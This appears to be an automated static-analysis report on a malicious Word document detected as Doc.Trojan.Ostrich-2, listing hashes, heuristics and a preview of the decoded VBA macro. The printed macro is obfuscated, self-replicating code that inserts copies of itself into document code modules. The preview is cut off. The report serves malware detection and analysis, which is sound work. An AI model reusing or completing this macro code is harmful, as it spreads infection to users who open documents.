Doc.Trojan.Ostrich-2 — Office (OLE) malware analysis

Static analysis result for SHA-256 74419b8dba372b31…

MALICIOUS

Office (OLE)

57.5 KB Created: 2000-09-06 09:13:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: 24ff8f567a264a6b8e2cec49ee74d342 SHA-1: 05ffe1a72ef0f3d68be1013396fc429d662a059f SHA-256: 74419b8dba372b31489d6db241ca513ba1bad97bd60ca92180c9039807eede93
120 Risk Score

Malware Insights

Doc.Trojan.Ostrich-2 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Doc.Trojan.Ostrich-2. Static analysis revealed a Document_Open VBA macro, indicating that malicious code executes automatically upon opening the document. The macro appears to be designed to download and execute a second-stage payload, as suggested by the embedded string '2/1/1' which may represent a URL or part of a command.

Heuristics 3

  • ClamAV: Doc.Trojan.Ostrich-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Ostrich-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 19717 bytes
SHA-256: 9c1f2d738ae4cf14e0d379b275e322dcb360a9d0e56e5dc88bc1484ff372f424
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub R2TTrKt()
PJ3QG8bd:
Yhw72V:
        On Error GoTo XC5p92l7
    Const AV0HQ = "­¸¨©›‚¯÷€“𗌣•¦„¹¬ì¼šê¿®�Ž†ˆõòŸÂèʲº°ÀçǘÄÿ¾í�Šï·½úëªÏ�â«Ãµ‹ ã‘ËÁ’ž¥ÍƒóåáŶ±¡Ó¢œÐ�ø»¤ù”³™´�ȇ৉ÑÌ" '"2/1/1"
     Dim Gu6uo As String
Dim AYn4L1 As Long
   Dim IJ8hG As Object
        Dim Upf5q As String

        
     GoTo ELJUH
      GoTo ST41MvM1
Ya06yr7:
    
IJ8hG.InsertLines AYn4L1, Gu6uo
Return

GoTo ST41MvM1
ELJUH:
     '2216,929  186,7117    3271,358    462,6598

  Dim BWaEg1D As Object
         Dim T28g8 As Object
   Dim XNXJ8erQ As Object
    '2452,214   2207,467    2519,228    705,977
      Dim Cf38Ok3 As Byte

        Dim DofuTU As String
 '4548,351  5528,961    5898,332    1464,439    1445,479    3645,693

         Dim Xl9RVi As String
    Dim Re6kR2S9 As Variant
 Dim Tp7acWqA As String
  Dim HhyeV As String
 Dim AqC76 As Long
   Dim D1CkC As Long
         Dim WmFYK As Long
  Dim Hq5BIA8R As Long
        Dim BoSJGF1X As Long
 Dim R8uPS1OJ As Long
        Dim N6c6iNCM As String
 Dim E11N9hva As String
        Dim L9r675h As String

Dim O87WP0rc As String
'1926,591   1687,314    1307,476    444,9875    344,6219    3552,119    2223,918    230,669
        Dim O46c25 As Variant
         
Dim AGwSy7 As Variant
     Dim IC6xFGe As Variant
       Dim W1U5N3s0 As String
  Dim DibMU As Variant

  GoSub UrLwd
        Randomize Timer

       GoTo FQ00m
       GoTo ST41MvM1
SYvG0Js:
     
With IJ8hG
        GoSub BW83u: N6c6iNCM = Xl9RVi
        For WmFYK = &O6 To UBound(DibMU)
AqC76 = &O0
         If .Find(DibMU(WmFYK), AqC76, &O1, .CountOfLines, 1, False, False, False) Then
  AYn4L1 = AqC76 + &O1: Gu6uo = N6c6iNCM: GoSub Ya06yr7

Else
'375,6292   5583,097
       AYn4L1 = .CountOfLines + &O1: Gu6uo = DibMU(&O4) & DibMU(WmFYK) & vbCr & N6c6iNCM & vbCr & DibMU(&O5): GoSub Ya06yr7
 End If
         '1452,931  1,372565    1211,926
         Next WmFYK
   '7999,172    3567,392    6805,117    292,9756    838,2194    932,2023
Upf5q = "þÍÊ": GoSub XgNA0aw: N6c6iNCM = Upf5q & Chr(&O40): AqC76 = &O0
  If .Find(N6c6iNCM, AqC76, &O1, .CountOfLines, 1, False, False, False) Then AYn4L1 = AqC76 Else AYn4L1 = &O1
         Gu6uo = DibMU(&O4) & N6c6iNCM & Xl9RVi & vbCr & Tp7acWqA & DibMU(&O5) & vbCr: GoSub Ya06yr7
 End With
       GoTo JIx98h99
         GoTo ST41MvM1
ME5J7l:
HhyeV = AV0HQ
For WmFYK = &O1 To Len(HhyeV)
     Hq5BIA8R = Int(Rnd * (Len(HhyeV) - &O1)) + &O1: N6c6iNCM = Mid(HhyeV, Hq5BIA8R, &O1)
     
Mid(HhyeV, Hq5BIA8R, &O1) = Mid(HhyeV, WmFYK, &O1): Mid(HhyeV, WmFYK, &O1) = N6c6iNCM
        Next WmFYK
       
GoTo WbGElD5
  GoTo ST41MvM1
WbGElD5:
       ReDim Re6kR2S9(&O26) As String
    '4142,649   3406,692    223,618 6631,804    67,30429    4020,235    639,2946    1137,197    61,79515
        With T28g8
         AqC76 = &O0: D1CkC = &O0
     .Find "PJ3QG8bd" & Chr(&O72), AqC76, &O0, &O0, &O0, True, True, False: If AqC76 = &O0 Then GoTo XC5p92l7
       .Find "ST41MvM1" & Chr(&O72), D1CkC, &O0, &O0, &O0, True, True, False: If D1CkC = &O0 Then GoTo XC5p92l7
  For WmFYK = AqC76 To D1CkC
  '2492,164 4761,531    1921,003    6,593213    248,7458    2498,195    64,08987    2358,521
   N6c6iNCM = Trim(.Lines(WmFYK, &O1))
 If N6c6iNCM <> "" And Left(N6c6iNCM, &O1) <> Chr(&O47) Then Tp7acWqA = Tp7acWqA & String(Int(Rnd * &O12), Chr(&O40)) & N6c6iNCM & vbCr
     If Int(Rnd * &O12) + &O1 = &O1 Then Tp7acWqA = Tp7acWqA & vbCr
     If Int(Rnd * &O11) + &O1 > &O10 Then
 N6c6iNCM = ""
         For Hq5BIA8R = &O0 To Int(Rnd * &O11) + &O1: N6c6iNCM = N6c6iNCM & Rnd * (Rnd * &O23420) & vbTab: Next Hq5BIA8R
    Tp7acWqA = Tp7acWqA & String(Int(Rnd * &O12), Chr(&O40)) & Chr(&O47) & N6c6iNCM & vbCr
      '1879,005 1309,242    9,723623    1567,592    595,3113    2280,098  
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.